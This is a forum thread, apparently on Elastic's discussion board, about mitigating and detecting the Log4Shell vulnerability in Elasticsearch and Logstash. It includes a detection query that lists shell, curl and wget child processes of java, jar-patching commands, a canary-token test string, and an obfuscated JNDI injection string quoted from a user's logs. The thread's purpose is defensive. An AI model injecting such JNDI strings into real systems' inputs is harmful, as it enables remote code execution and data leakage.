Zero-day-exploit in log4j2 which is part of elasticsearch

What datasets are needed to get the query:

sequence by host.id with maxspan=1m
 [network where event.action == "connection_attempted" and 
  process.name : "java" and
  /* 
     outbound connection attempt to 
     LDAP, RMI or DNS standard ports 
     by JAVA process 
   */ 
  destination.port in (1389, 389, 1099, 53, 5353)] by process.pid
 [process where event.type == "start" and 

  /* Suspicious JAVA child process */
  process.parent.name : "java" and
   process.name : ("sh", 
                   "bash", 
                   "dash", 
                   "ksh", 
                   "tcsh", 
                   "zsh", 
                   "curl",
                   "perl*",
                   "python*",
                   "ruby*",
                   "php*", 
                   "wget")] by process.parent.pid

Working? I was hopeing auditbeat process or socket would be enough, but I cannot find event.action == "connection_attempted" there. Maybe Elastic Endpoint Security data required? Can I make this query work only with Auditbeat socket dataset?

Maybe adding network_flow to event.action? But the Auditbeat socket dataset seems to miss process.parent.pid?

I would have expected a more solid response from Elastic.

It is stated that Logstash is not vulnerable, relying on the up-to-date JDK where LDAP external code loading is disabled. But Logstash also includes SnakeYAML and possibly other libraries that will allow JNDI injection. Just relying on up-to-date JDK seems like a very weak and insecure response to me.

Also see PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.

You realize you are talking about one of the biggest if not the biggest security issue in Java ever here, which is being actively exploited and much bigger than something like the Equifax data breach?

I'm no Elastic customer, so not in a position to make any demands, but am now also 100% certain I will never be one.

1 Like

I did some digging in and it appears that logstash plugins which depend on older version of logstash-core-plugin-api may also be affected, even when logstash is updated to include log4j v2.15.0.

It appears that logstash-core gem depends on an old vulnerable version of log4j as well - e.g. logstash-core | RubyGems.org | your community gem host.

Logstash plugins depend on logstash-core-plugin-api which depends on logstash-core so it's a transitive dependency of the plugin (and as such, gets pulled in when bundling all the dependencies for distribution). A lot of plugins bundle all the dependencies in the gems they push to RubyGems.

It appears that the latest version of logstash-core (logstash-core | RubyGems.org | your community gem host) doesn't specify log4j as a dependency anymore (how does that work now? does it just use log4j bundled with logstash core?).

Can someone please double check and confirm my thinking? Thanks.

1 Like

@Kami I think this would make sense in a dedicated thread in the Logstash section; unless you want to report a security issue then it's Security issues | Elastic. But I think you're more after understanding / discussing best practices going forward?
And I assume that Logstash with it's plugin architecture and dependencies will be the most complicated product to "get right". bump log4j version to 2.15.0 (#13494) · elastic/logstash@c12d2f5 · GitHub alone might not be enough.

1 Like

@MikeN123 I don't think that's the full picture: Over 100 people evaluated all potentially vulnerable projects, worked on detection mechanisms, and documented it in Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog within 24h. It took some time to get as correct and complete as possible in that timeframe — nobody wants "well actually ..." every 2h.

And we knew that thanks to the Java Security Manager in Elasticsearch this wasn't a remote code execution situation — why should your logging library be allowed to call random URLs after all. The extra work we put into security features have actually paid off.

1 Like

You had 100 people working on this but they couldn’t get a fixed logstash build out? That’s disturbing.

And I was just replying to one of the Elastic people saying “it’s weekend”, what is just not something you should say with an urgent security issue like this.

Also note that this is not about calling random URLs. That is the PoC yes, but other evaluations using other gadgets are possible. That may still be avoided by the (deprecated) SecurityManager, I don’t know, but please don’t think this is only about jndi:ldap.

  1. You underestimate the work to build, test individually, and test in combination all of the artifacts on all the supported platforms an Elastic Stack release requires. 7.16.1 and 6.8.21 are rare emergency releases that will come out shortly. This is getting all the attention that it should.
  2. I'm sorry if that comment came off the wrong way — it doesn't cover all the work that has been going into this behind the scenes.
  3. Yes, it's still an information disclosure issue for Elasticsearch, but there is a mitigation and you should upgrade once available. It's been a bad weekend for everyone, but we're all in this together and need to work work it out : )
6 Likes
  1. Is this a problem on Elastic Cloud (as I understand, it is not) for ES6 and ES7.
  2. Is this a problem on Elastic Cloud for clusters not yet upgraded (ES5)? I could not find any info on this (yes, this week upgrading to ES6-ES7 will be priority...)

@elastic Thanks for all the effort you put in this. Please focus on making sure the patch works and fully covers Logstash, so we don't have to install 7.16.2 in a few days..

So is it possible to provide a SIEM rule which does not require the Elastic Endpoint Security agent process dataset? (See my previous post)

Thanks for the response.

Sorry, this post should have gone in the Logstash section. I will open a new thread there.

And yeah, I'm mostly interested in the best practices and how other plugins which may be affected plan to handle that.

As a workaround for Logstash, if you can do the following before attempting to parse the event, it seems to mitigate the issue.

  if "jndi:" in [message] {
    mutate {
      gsub => [
        "[message]", "jndi", "BLART"
      ]
    }
  }

Using the same testing approach you did, I can confirm that my canary token is NOT triggered if this appears before the json {} filter

Logstash output

[2021-12-12T10:33:08,722][WARN ][logstash.filters.json    ][main][18d8528acb4b1628914404ffc234140d00f6c382fc7f21dbd350ac59bbd38fa5] Error parsing json {:source=>"message", :raw=>"${BLART:ldap://xxx.canarytokens.com/a}", :exception=>#<LogStash::Json::ParserError: Unrecognized token '$': was expecting ('true', 'false' or 'null')
 at [Source: (byte[])"${BLART:ldap://xxx.canarytokens.com/a}"; line: 1, column: 3]>}
{
          "host" => "c1523f8434cf",
       "message" => "${BLART:ldap://xxx.canarytokens.com/a}",
          "tags" => [
        [0] "_jsonparsefailure"
    ],
      "@version" => "1",
          "type" => "stdin",
    "@timestamp" => 2021-12-12T10:33:08.534Z
}

Does Logstash needs to be restarted after doing:

zip -q -d <LOGSTASH_HOME>/logstash-core/lib/jars/log4j-core-2.* org/apache/logging/log4j/core/lookup/JndiLookup.class

?

On a somewhat related note - you should also make sure that this command indeed removes JndiLookup.class from the jar.

In my case, when testing it, that didn't happen - glob expansion didn't work correctly with zip, so I needed to specify full path to log4j jar.

Here is a temporary workaround I'm using (from Dockerfile):

RUN find /opt/logstash/ -name "*log4j*core*.jar" 2>&1
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi
RUN zip -q -d /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
RUN zip -q -d /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi

In my case, I also verify that Jndi class has been correctly removed by grepping the jar contents before and after and I also removed that class from log4j.jar which comes bundled with a plugin.

3 Likes

Thanks @Kami

@elastic Please update Elastic Security Announcement for log4shell with updated commands to also remove the class from Logstash plugins etc? (if necessary) And please let me know if Logstash restart is required after removal of the class.

Please be aware that it's possible to trigger a JNDI lookup from an input plugin, before any filter kicks in, therefore I'd refrain from relying on this workaround.
The only known mitigation until the release is out is to remove the class from the log4j jar as stated in the advisory.

3 Likes

@willemdh the advisory will be updated to note the need to restart after removing the class from the jar.

remove the class from Logstash plugins etc? (if necessary)

This is won't be necessary as the loaded log4j-core jar is from logstash-core.

2 Likes

Please, How can I check exactly if my version of self-hosted elastic is exploitable or not?

Well, but be aware of obfuscation. I've found the following in my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"

so, the query doesn't match.

Is there any indication when 7.16.1 is being released?

Edit: read over it, sorry. Target is today.